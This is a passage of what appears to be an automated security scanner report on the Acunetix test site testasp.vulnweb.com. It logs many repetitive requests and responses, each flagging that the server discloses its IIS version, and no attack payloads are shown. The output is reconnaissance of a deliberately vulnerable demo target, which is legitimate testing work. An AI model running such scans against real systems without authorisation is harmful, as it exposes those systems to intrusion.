Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a 